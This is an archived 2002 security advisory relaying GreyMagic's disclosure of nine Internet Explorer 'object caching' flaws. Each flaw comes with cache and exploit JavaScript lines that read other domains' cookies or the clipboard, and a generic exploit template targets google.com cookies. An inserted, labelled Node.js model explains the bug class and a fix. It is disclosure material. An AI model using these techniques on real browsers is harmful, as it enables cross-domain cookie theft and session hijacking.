
Vulnerable cached objects in IE
23rd Oct 2002 [SBWID-5772]
COMMAND

	Vulnerable cached objects in IE

SYSTEMS AFFECTED

	IE5.5 Win98. IE5.5 NT4. IE6 Win98. IE6 Win2000. IE6 WinXP.
	

	IE 5 SP2 and IE6 SP1 are not vulnerable.

PROBLEM

	In GreyMagic Software Advisory [GM#012-IE] :
	

	 http://security.greymagic.com/adv/gm012-ie/

	

	 Introduction:

	 =============

	

	When communicating between windows, security  checks  ensure  that  both
	pages are in the same security  zone  and  on  the  same  domain.  These
	crucial security checks wrongly assume that certain methods and  objects
	are only going to  be  called  through  their  respective  window.  This
	assumption  enables  some  cached  methods  and   objects   to   provide
	interoperability between otherwise separated documents.
	

	Many security issues arise from storing references to objects  that  are
	supposed to be inaccessible once the page unloads. PivX recently disclosed
	such an issue in the <object> element, whose "object" property kept a
	valid reference to the unloaded content.
	

	 Discussion:

	 ===========

	

	Through exhaustive  research,  we  discovered  nine  vulnerabilities  in
	Internet  Explorer  involving  object  caching,  most  of  them   highly
	critical.  We're  grouping  all  of  these  vulnerabilities  into   this
	advisory in order to avoid a flood and repetitive statements.
	

	Object caching takes place when the attacker opens a window to  a  page
	on his own site and stores references to its methods or objects. The URL
	in the window is then changed to the victim page, but the cached
	references stay in place and now provide direct access to the new
	document, because the security check ran only once, at lookup time.
	

	All  nine  vulnerabilities  are  of  the  same  general  class   (object
	caching). However, each of them is a separate vulnerability, which  uses
	a unique method for exploitation.
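The following Node.js model is an added example, not code from the GreyMagic advisory or from Internet Explorer. It reproduces the bug class in miniature: a cross-window access check that runs once, when the caller looks a method up, is defeated by holding on to the returned method and calling it after the target window has navigated. The hardened variant repeats the check at every invocation against the document the call is about to touch. All names (`BrowserWindow`, `navigate`, the `lookup` functions) are hypothetical, and the cookie value is constructed sample data.

```javascript
// Added example (not from the GreyMagic advisory): a Node.js model of the
// "object caching" bug class. Every name here is hypothetical; the cookie
// is constructed sample data.

function makeDocument(origin, cookie) {
  const doc = { origin, cookie, elements: {} };
  // Elements carry a back-pointer to their document, which is what the
  // advisory's  fVuln("BODY")[0].document.cookie  exploit lines rely on.
  doc.elements.BODY = { tagName: "BODY", document: doc };
  return doc;
}

class BrowserWindow {
  constructor(origin) {
    this.document = makeDocument(origin, "");
  }
  // Models "oWin.location.href = ...": the window object keeps its identity
  // but receives a brand new document, possibly in another origin.
  navigate(origin, cookie) {
    this.document = makeDocument(origin, cookie);
  }
}

function sameOrigin(a, b) {
  return a.document.origin === b.document.origin;
}

// VULNERABLE: the check runs only when the caller first looks the method up.
// The returned function closes over the target *window* and resolves that
// window's current document at call time, so it follows the window across
// a navigation into the victim's origin.
function vulnLookupDocumentMethod(caller, target, name) {
  if (!sameOrigin(caller, target)) throw new Error("access denied: " + name);
  return function getElementsByTagName(tag) {
    const el = target.document.elements[tag.toUpperCase()];
    return el ? [el] : [];
  };
}

// HARDENED: the access check is repeated on every invocation, against the
// document the call is about to touch, so a reference cached before the
// navigation is useless once the target window sits in another origin.
function safeLookupDocumentMethod(caller, target, name) {
  if (!sameOrigin(caller, target)) throw new Error("access denied: " + name);
  return function getElementsByTagName(tag) {
    if (!sameOrigin(caller, target)) throw new Error("access denied: " + name);
    const el = target.document.elements[tag.toUpperCase()];
    return el ? [el] : [];
  };
}

// Replays the advisory's generic exploit against either implementation:
// open a same-origin window, cache the method, navigate the window to the
// victim site, then call the cached reference.
function runObjectCachingAttack(lookup) {
  const attacker = new BrowserWindow("http://attacker.example");
  const oWin = new BrowserWindow("http://attacker.example");    // open("blank.html", ...)
  const fVuln = lookup(attacker, oWin, "getElementsByTagName");  // [Cache line]
  oWin.navigate("http://google.com", "PREF=constructed-sample-cookie"); // victim page loads
  try {
    return { leaked: fVuln("BODY")[0].document.cookie, denied: false }; // [Exploit line]
  } catch (e) {
    return { leaked: null, denied: true };
  }
}

console.log("vulnerable:", runObjectCachingAttack(vulnLookupDocumentMethod));
console.log("hardened:  ", runObjectCachingAttack(safeLookupDocumentMethod));
```

The design point is where the check lives: a check at lookup time protects only the document that existed at lookup time, while a check at call time protects whatever document the window holds when the reference is actually used. An equivalent fix is to bind the returned method to the document object it was retrieved from rather than to the window, so that after navigation it can only operate on the discarded document.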
	

	Each item in the list below consists of three parts, "Cache"  shows  how
	to cache the vulnerable object, "Exploit" shows  how  the  vulnerability
	works  in  context  and  "Impact"  details  the  implications   of   the
	vulnerability.
	

	"Full access" means access to any page's Document Object  Model  in  any
	domain and any zone. The implications include (but are not limited  to)
	reading cookies from any domain, forging content  in  any  URL,  reading
	local files and executing arbitrary programs.
	

	1. showModalDialog
	

	Cache: var fVuln=oWin.showModalDialog;

	Exploit - IE 5.5:
	fVuln("javascript:alert(dialogArguments.document.cookie)",oWin,"");

	Exploit - IE 6: Not trivial but possible, by using our old "analyze.dlg"
	  vulnerability.

	Impact: Full access in IE5.5, "My Computer" zone access in IE6.

	

	

	2. external
	

	Cache: var oVuln=oWin.external;

	Exploit: oVuln.NavigateAndFind("javascript:alert(document.cookie)","","");

	Impact: Full access.

	

	

	3. createRange
	

	Cache: var fVuln=oWin.document.selection.createRange;

	Exploit: fVuln().pasteHTML("<img src=\"javascript:alert(document.cookie)\">");

	Impact: Full access.

	

	

	4. elementFromPoint
	

	Cache: var fVuln=oWin.document.elementFromPoint;

	Exploit: alert(fVuln(1,1).document.cookie);

	Impact: Full access.

	

	

	5. getElementById
	

	Cache: var fVuln=oWin.document.getElementById;

	Exploit: alert(fVuln("ElementIdInNewDoc").document.cookie);

	Impact: Full access.

	

	

	6. getElementsByName
	

	Cache: var fVuln=oWin.document.getElementsByName;

	Exploit: alert(fVuln("ElementNameInNewDoc")[0].document.cookie);

	Impact: Full access.

	

	

	7. getElementsByTagName
	

	Cache: var fVuln=oWin.document.getElementsByTagName;

	Exploit: alert(fVuln("BODY")[0].document.cookie);

	Impact: Full access.

	

	

	8. execCommand
	

	Cache: var fVuln=oWin.document.execCommand;

	Exploit: fVuln("SelectAll"); fVuln("Copy"); alert(clipboardData.getData("text"));

	Impact: Read access to the loaded document.

	

	

	9. clipboardData
	

	Cache: var oVuln=oWin.clipboardData;

	Exploit: alert(oVuln.getData("text")); or oVuln.setData("text","data");

	Impact: Read/write access to the clipboard, regardless of settings.

	

	

	 Exploit:

	 ========

	

	This generic exploit demonstrates how an attacker may read the  client's
	"google.com" cookie using one of the cached objects above.
	

	<script language="jscript">
	var oWin=open("blank.html","victim","width=100,height=100");
	[Cache line here]
	// navigate the opened window (not the attacker's own page) to the victim site
	oWin.location.href="http://google.com";
	setTimeout(
	    function () {
	        [Exploit line(s) here]
	    },
	    3000
	);
	</script>

	

	 Demonstration:

	 ==============

	

	We put together a single nine-in-one  proof  of  concept  demonstration,
	which can be found at http://security.greymagic.com/adv/gm012-ie/.

SOLUTION

	Until a patch becomes available, either disable Active Scripting or
	upgrade to IE6 SP1, which (like IE 5 SP2) is not affected.
